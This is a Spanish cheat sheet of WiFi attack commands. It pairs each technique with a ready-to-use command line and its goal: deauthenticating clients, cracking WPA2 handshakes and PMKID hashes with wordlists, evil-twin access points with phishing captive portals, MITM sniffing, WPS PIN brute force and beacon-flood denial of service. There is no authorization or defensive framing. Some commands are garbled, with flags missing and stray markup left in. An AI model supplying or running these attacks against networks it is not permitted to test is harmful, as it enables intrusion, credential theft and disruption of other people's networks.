

Tabla de Comandos para Ataques WiFi

📝 Tabla de Comandos para Ataques WiFi

Tipo de Ataque	Herramienta	Comando	Objetivo
Reconocimiento	airodump-ng	sudo airodump-ng wlan0	Escaneo pasivo de redes y clientes
		sudo airodump-ng -c <canal>bssid <bssid> - w captura wlan0</bssid></canal>	Captura dirigida a una red específica
Deautenticación	aireplay-ng	sudo aireplay-ngdeauth 10 -a <bssid> wlan0</bssid>	Expulsar a todos los clientes del AP (10 paquetes)
		<pre>sudo aireplay-ngdeauth 10 -a <bssid> -c <mac_cliente> wlan0</mac_cliente></bssid></pre>	Expulsar a un cliente específico
	airodump-ng	(igual que captura dirigida arriba)	Recolectar el handshake WPA2- PSK
	aircrack-ng	aircrack-ng -w rockyou.txt captura.cap	Romper el WPA2 con diccionario
€ Evil Twin (AP falsa)	airbase-ng	sudo airbase-ng -e "WiFiGratis" -c 6 wlan0	Crear punto de acceso falso
	hostapd + dnsmasq	Configuración avanzada para portal cautivo (phishing)	Capturar credenciales
₫ MITM / Sniffing	bettercap	sudo bettercap -iface wlan0mon	Interceptar tráfico y actuar como intermediario
		<pre>net.probe on wifi.recon on wifi.assoc <bssid></bssid></pre>	Escanear y asociarse a una red
Ataque WPS	reaver	sudo reaver -i wlan0mon - b <bssid> -vv</bssid>	Fuerza bruta al PIN WPS
• Ataque PMKID	hcxdumptool	sudo hcxdumptool -i wlan0 enable_status=15 -o pmkid.pcapng	Captura de hash PMKID WPA2
	hcxpcapngtool	hcxpcapngtool -o hash.22000 pmkid.pcapng	Convertir a formato de Hashcat
	hashcat	hashcat -m 22000 hash.22000 rockyou.txt	Ataque por diccionario con

Tipo de Ataque	Herramienta	Comando	Objetivo
			GPU
Beacon Flood / DoS	mdk4	sudo mdk4 wlan0mon b -n "RedFalsa" -f	Inundar con falsas redes SSID
Prueba de Inyección	aireplay-ng	sudo aireplay-ng -9 wlan0mon	Verificar si la tarjeta soporta inyección

Extras de Configuración

Paso	Comando	
Activar modo monitor	sudo ip link set wlan0 down && sudo iw wlan0 set monitor control && sudo ip link set wlan0 up	
O usar	sudo airmon-ng start wlan0	
Ver interfaces inalámbricas	iwconfig	
Desactivar modo monitor	sudo airmon-ng stop wlan0mon	